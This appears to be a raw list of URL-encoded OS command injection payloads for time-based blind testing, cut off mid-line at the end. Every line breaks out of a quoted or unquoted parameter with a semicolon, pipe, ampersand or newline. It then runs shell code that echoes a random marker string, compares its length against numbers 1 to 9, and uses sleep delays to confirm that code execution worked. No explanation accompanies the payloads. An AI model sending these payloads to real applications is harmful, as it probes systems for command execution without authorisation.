%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%22%7C%20%5B%201%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%202%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%203%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%204%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%205%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%206%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%207%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%208%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%7C%20%5B%209%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%22%7C%20%5B%201%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%202%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%203%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%204%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%205%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%206%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%207%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%208%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%7C%20%5B%209%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%22%7C%20%5B%201%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%202%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%203%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%204%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%205%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%206%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%207%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%208%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%7C%20%5B%209%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%22%7C%20%5B%201%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%202%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%203%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%204%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%205%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%206%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%207%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%7C%20%5B%208%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%